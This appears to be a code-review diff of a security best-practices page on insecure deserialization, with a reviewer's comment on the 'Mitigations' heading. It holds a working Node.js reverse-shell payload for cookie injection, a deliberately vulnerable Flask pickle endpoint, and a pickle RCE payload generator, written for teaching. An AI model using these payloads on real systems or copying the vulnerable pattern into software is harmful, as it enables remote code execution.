content/en/BestPractices/Insecure_Deserialization.md

```diff
@@ -0,0 +1,434 @@
+
+```
+{"rce":"_$$ND_FUNC$$_function() { var net = require('net'); var spawn =
+require('child_process').spawn; HOST = \"127.0.0.1\"; PORT = \"1337\";
+TIMEOUT = \"5000\"; if (typeof String.prototype.contains === 'undefined') { 
+String.prototype.contains = function(it) { return this.indexOf(it) != -1;
+}; } function c(HOST, PORT) { var client = new net.Socket();
+client.connect(PORT, HOST, function() { var sh = spawn(\"sh\", []);
+client.write(\"Connected!\"); client.pipe(sh.stdin);
+sh.stdout.pipe(client); sh.stderr.pipe(client); sh.on('exit',
+function(code, signal) { client.end(\"Disconnected!\"); }); });
+client.on('error', function(e) { setTimeout(c(HOST, PORT), TIMEOUT); }); }
+c(HOST, PORT);}( )"}
+```
+
+Base64 encoding the above payload and putting it as the cookie value of the request will create a reverse shell to `127.0.0.1` on port `1337`.
+
+## Python3
+The most common use of deserialization in python is via the `pickle.loads()` function. Consider the following server code:
+```python
+import pickle
+import binascii
+from base64 import urlsafe_b64decode
+from flask import Flask
+from flask import request, jsonify
+
+app = Flask(__name__)
+
+
+@app.route('/', methods = ['GET', 'POST'])
+def user():
+    if request.method == 'GET':
+        return jsonify({"message":"Hello World!"})
+
+        
+    if request.method == 'POST':
+        try:
+            data = request.form 
+            decoded = urlsafe_b64decode(data['payload'])
+            username = pickle.loads(decoded) #vulnerable deserialization
+            return jsonify({'Hi':username})
+
+        except Exception as e:
+            return jsonify({'Hi': 'Stranger'})
+
+if __name__ == '__main__':
+    app.run()
+
+```
+
+The server behaves similarly to the NodeJS example. It listens on port 5000 and when a POST request is made to the endpoint, it tries to decode and deserialize the data in order to extract a username from it. In case of any errors, it responds back with a generic message otherwise replies with the name of the user. 
+
+Again, the serialized data is read directly from the request body without any checks. Therefore, it can be exploited easily to gain Remote code execution by generating payloads with the following script:
+
+```python
+```python
+import pickle
+import base64
+import os
+
+RCE_CMD = 'sleep 10'
+
+class RCE:
+    def __reduce__(self):
+        cmd = (RCE_CMD)
+        return os.system, (cmd,)
+
+
+if __name__ == '__main__':
+    pickled = pickle.dumps(RCE())
+    print(base64.urlsafe_b64encode(pickled))
+```
+
+The resulting output would be a payload, which when sent in the POST body would execute the respective command on the system.
+
+# Mitigations
+
+- Never directly deserialize any user-controlled or untrusted data. For example, take the original code snippet:  
```

Comment:
"Mitigations" suggest that you have more than one solution. I see only one solution in your draft.

```suggestion
## Solution

Do not directly deserialize any user-controlled or untrusted data. For example, take the original code snippet:  
```